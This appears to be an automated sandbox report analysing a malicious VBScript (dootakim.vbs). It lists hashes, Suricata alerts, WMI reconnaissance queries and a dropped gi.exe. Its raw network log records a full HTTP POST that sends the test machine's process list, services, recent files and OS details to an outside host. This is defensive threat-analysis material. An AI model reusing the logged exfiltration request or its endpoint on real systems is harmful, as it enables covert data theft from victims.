Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	June 8, 2021, 9:29 a.m.	June 8, 2021, 9:31 a.m.

Size	6.0KB
Type	ASCII text, with CRLF line terminators
MD5	`7bf15c10dd4e523a1338d054c0ace9d9`
SHA256	`d5213a7612dbeec88cbfd73d8457b741f9014b137e640ff81bb8c1742b066a0d`
CRC32	`40A5D1EF`
ssdeep	`192:ADeat+P8BlCqCSVXy+t34iBdEEWcOU0rAZtkVnZzqU/C+6tpMf:ADeat+PqlCqCSVXy+t34i7EErL4AtkVL`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\dootakim.vbs
7180

Name	Response	Post-Analysis Lookup
alyssalove.getenjoyment.net	A 185.176.43.98	185.176.43.98
www.daum.net	CNAME www.g.daum.net A 203.133.167.81 A 211.231.99.17	203.133.167.16

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
185.176.43.98	Active	Moloch
203.133.167.81	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49809 -> 203.133.167.81:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49808 -> 185.176.43.98:80	2027117	ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration	A Network Trojan was detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49809 203.133.167.81:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=Thawte TLS RSA CA G1	C=KR, ST=Jeju-do, L=Jeju-si, O=Kakao Corp., CN=*.daum.net	67:7d:a8:dd:b7:e1:47:25:d5:d9:6c:3f:3c:e1:5b:43:0b:80:8b:69

Queries for the computername (3 events)

Time & API	Arguments	Status	Return
GetComputerNameW June 8, 2021, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 8, 2021, 9:29 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW June 8, 2021, 9:29 a.m.	computer_name: TEST22-PC	1	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)

Performs some HTTP requests (2 events)

request	POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)
request	GET https://www.daum.net/favicon.ico

Sends data using the HTTP POST Method (1 event)

request

POST http://alyssalove.getenjoyment.net/0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86)

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Roaming\gi.exe

Creates a shortcut to an executable file (41 events)

file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\한글2010(정품).lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ok1.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\msi1.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Settings.ini.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\테스트.txt.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\doc2.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\attach.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test_zip_doc.eml.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_Click.pyw.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\agent.pyw.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\시리얼넘버.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.txt.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\msi2.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx.png.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Chrome.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\exe1.zip.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_History.txt.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test.eml.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.py.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ok2.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\ZeroAI_Click.py.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\Python27.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\util.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Windows Explorer.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test (1).eml.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx2.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\sn.txt.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\docx1.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\agent.py.lnk
file	C:\Users\test22\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\readme.txt.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\age.pyw.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\test_doc.eml.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\office_2007.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\click.pyw.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\한글2010(정품) (2).lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\시작프로그램.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\doc.png.lnk
file	C:\Users\test22\AppData\Roaming\microsoft\Windows\Recent\다운로드.lnk

Executes one or more WMI queries (4 events)

wmi	Select Name, Version from Win32_Product Where Name Like 'Microsoft .NET Framework%'
wmi	Select * from Win32_Process
wmi	Select * from Win32_OperatingSystem
wmi	Select * from Win32_Service WHERE state = "Running"

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Wscript.exe initiated network communications indicative of a script based payload download (6 events)

Time & API	Arguments	Status	Return	Repeated
WSASend June 8, 2021, 9:29 a.m.	buffer: POST /0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86) HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 2071 Host: alyssalove.getenjoyment.net socket: 816		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: v=aelookupsvc audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc kmservice lanmanserver lanmanworkstation lmhosts mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain tabletinputservice themes trkwks uxsms wcncsvc wdiservicehost winhttpautoproxysvc winmgmt wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe srvany.exe taskhost.exe kmservice.exe conhost.exe sppsvc.exe svchost.exe dwm.exe explorer.exe searchindexer.exe thunderbird.exe pw.exe audiodg.exe splwow64.exe searchprotocolhost.exe searchfilterhost.exe mobsync.exe pw.exe taskhost.exe cmd.exe conhost.exe wscript.exe pw.exe slui.exe wmiprvse.exe &r=age.pyw.lnk====agent.py.lnk====agent.pyw.lnk====attach.png.lnk====click.lnk====click.py.lnk====click.pyw.lnk====click.txt.lnk====desktop.ini====doc.png.lnk====doc2.png.lnk====docx.png.lnk====docx1.png.lnk====docx2.png.lnk====exe1.zip.lnk====msi1.png.lnk====msi2.png.lnk====Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk====office_2007.lnk====ok1.png.lnk====ok2.png.lnk====Python27.lnk====readme.txt.lnk====Settings.ini.lnk====sn.txt.lnk====test (1).eml.lnk====test.eml.lnk====test_doc.eml.lnk====test_zip_doc.eml.lnk====util.lnk====ZeroAI_Click.py.lnk====ZeroAI_Click.pyw.lnk====ZeroAI_History.txt.lnk====ë¤ì´ë¡ë.lnk====ìë¦¬ì¼ëë².lnk====ììíë¡ê·¸ë¨.lnk====íì¤í¸.txt.lnk====íê¸2010(ì í) (2).lnk====íê¸2010(ì í).lnk====&un=test22&os=Microsoft Windows 7 Professional KN \|C:\Windows\|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====readme.txt====&tll=Chrome.lnk====desktop.ini====Internet Explorer.lnk====Windows Explorer.lnk==== socket: 816		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: ok`¾¹èbC$2NþïoxÈ:NÉARì¶fD/5 ÀÀÀ À 28*ÿwww.daum.net socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: 1&]VÑÕÄûÁcÌÇÄ÷®òõÃÖBÌ> ³<ÏWDev>{ÃD>Þ= 6¤g·æÈDµ½rÖÞ9·Uv9sú8þ¸&Ýåçh¾qöÕæÎ¼Ù%ÞÃm;xÖv>ÒE¿e=g.ÑUîÒÀ·àVKäÀu¶çK%¨S 9ëÜïrÅ×'Ôâ4A69ö^Ý!r_Û¥p[qøð¯wÓ0©¬\|8Ii4Xe<i"³vð-oggöSø¨Ý:¹Px U°ÐWð8æ?´¢2NÊ2Úó°=`£"æÀË\ù°0ç«§ã'%KþA®4tï{.r´ó2Si<$òÒüÒÆUa¦½³úxU socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: Ð}Í°Ée:bÁÌS3Ëwx^Pöê5uUWR³!qg³4¨mbÜ§»Î,ÆZû[[IXjzG6¥çV;ùõ¨Þ7B ¾ ¥Ýé6 Æ;=!váÞ.?´Ys&7·¿7LPá¢@C¾Ì_ flsÝbÛößåµ.¬³¿þñ©VÏ&×ÙyÂÂéoûø"UÉ¾: :ÓÌ§(¸&ïªloU {ÐvGL^ÌX Xi socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: ÄnXey*ûîÙ\|» 20fÙ¯UÝÂ÷u-â",Ù]îµ socket: 824		0	0

Network communications indicative of a potential document or script payload download was initiated by the process wscript.exe (6 events)

Time & API	Arguments	Status	Return	Repeated
WSASend June 8, 2021, 9:29 a.m.	buffer: POST /0423/v.php?ki87ujhy=C:\Program%20Files%20(x86)&rdxvdw=C:\Program%20Files%20(x86) HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Accept-Language: ko User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Content-Length: 2071 Host: alyssalove.getenjoyment.net socket: 816		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: v=aelookupsvc audioendpointbuilder audiosrv bfe bits browser cryptsvc cscservice dcomlaunch dhcp dnscache dps eventlog eventsystem fdphost fdrespub fontcache gpsvc ikeext iphlpsvc kmservice lanmanserver lanmanworkstation lmhosts mmcss mpssvc netman netprofm nlasvc nsi pcasvc plugplay policyagent power profsvc protectedstorage rpceptmapper rpcss samss schedule sens shellhwdetection spooler sppsvc sppuinotify ssdpsrv sysmain tabletinputservice themes trkwks uxsms wcncsvc wdiservicehost winhttpautoproxysvc winmgmt wscsvc wsearch wuauserv system idle process system smss.exe csrss.exe wininit.exe csrss.exe winlogon.exe services.exe lsass.exe lsm.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe svchost.exe spoolsv.exe svchost.exe svchost.exe srvany.exe taskhost.exe kmservice.exe conhost.exe sppsvc.exe svchost.exe dwm.exe explorer.exe searchindexer.exe thunderbird.exe pw.exe audiodg.exe splwow64.exe searchprotocolhost.exe searchfilterhost.exe mobsync.exe pw.exe taskhost.exe cmd.exe conhost.exe wscript.exe pw.exe slui.exe wmiprvse.exe &r=age.pyw.lnk====agent.py.lnk====agent.pyw.lnk====attach.png.lnk====click.lnk====click.py.lnk====click.pyw.lnk====click.txt.lnk====desktop.ini====doc.png.lnk====doc2.png.lnk====docx.png.lnk====docx1.png.lnk====docx2.png.lnk====exe1.zip.lnk====msi1.png.lnk====msi2.png.lnk====Office.2010.Toolkit.and.EZ-Activator.v2.1.5.Final.lnk====office_2007.lnk====ok1.png.lnk====ok2.png.lnk====Python27.lnk====readme.txt.lnk====Settings.ini.lnk====sn.txt.lnk====test (1).eml.lnk====test.eml.lnk====test_doc.eml.lnk====test_zip_doc.eml.lnk====util.lnk====ZeroAI_Click.py.lnk====ZeroAI_Click.pyw.lnk====ZeroAI_History.txt.lnk====ë¤ì´ë¡ë.lnk====ìë¦¬ì¼ëë².lnk====ììíë¡ê·¸ë¨.lnk====íì¤í¸.txt.lnk====íê¸2010(ì í) (2).lnk====íê¸2010(ì í).lnk====&un=test22&os=Microsoft Windows 7 Professional KN \|C:\Windows\|\Device\Harddisk0\Partition2&sv=6.1.7601&msv=12&dnv=4.5.50709&dll=desktop.ini====readme.txt====&tll=Chrome.lnk====desktop.ini====Internet Explorer.lnk====Windows Explorer.lnk==== socket: 816		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: ok`¾¹èbC$2NþïoxÈ:NÉARì¶fD/5 ÀÀÀ À 28*ÿwww.daum.net socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: 1&]VÑÕÄûÁcÌÇÄ÷®òõÃÖBÌ> ³<ÏWDev>{ÃD>Þ= 6¤g·æÈDµ½rÖÞ9·Uv9sú8þ¸&Ýåçh¾qöÕæÎ¼Ù%ÞÃm;xÖv>ÒE¿e=g.ÑUîÒÀ·àVKäÀu¶çK%¨S 9ëÜïrÅ×'Ôâ4A69ö^Ý!r_Û¥p[qøð¯wÓ0©¬\|8Ii4Xe<i"³vð-oggöSø¨Ý:¹Px U°ÐWð8æ?´¢2NÊ2Úó°=`£"æÀË\ù°0ç«§ã'%KþA®4tï{.r´ó2Si<$òÒüÒÆUa¦½³úxU socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: Ð}Í°Ée:bÁÌS3Ëwx^Pöê5uUWR³!qg³4¨mbÜ§»Î,ÆZû[[IXjzG6¥çV;ùõ¨Þ7B ¾ ¥Ýé6 Æ;=!váÞ.?´Ys&7·¿7LPá¢@C¾Ì_ flsÝbÛößåµ.¬³¿þñ©VÏ&×ÙyÂÂéoûø"UÉ¾: :ÓÌ§(¸&ïªloU {ÐvGL^ÌX Xi socket: 824		0	0
WSASend June 8, 2021, 9:29 a.m.	buffer: ÄnXey*ûîÙ\|» 20fÙ¯UÝÂ÷u-â",Ù]îµ socket: 824		0	0

The process wscript.exe wrote an executable file to disk (1 event)

file	C:\Users\test22\AppData\Roaming\gi.exe

Executes one or more WMI queries which can be used to create or modify services (1 event)

wmi	Select * from Win32_Service WHERE state = "Running"

Generates some ICMP traffic

dootakim.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All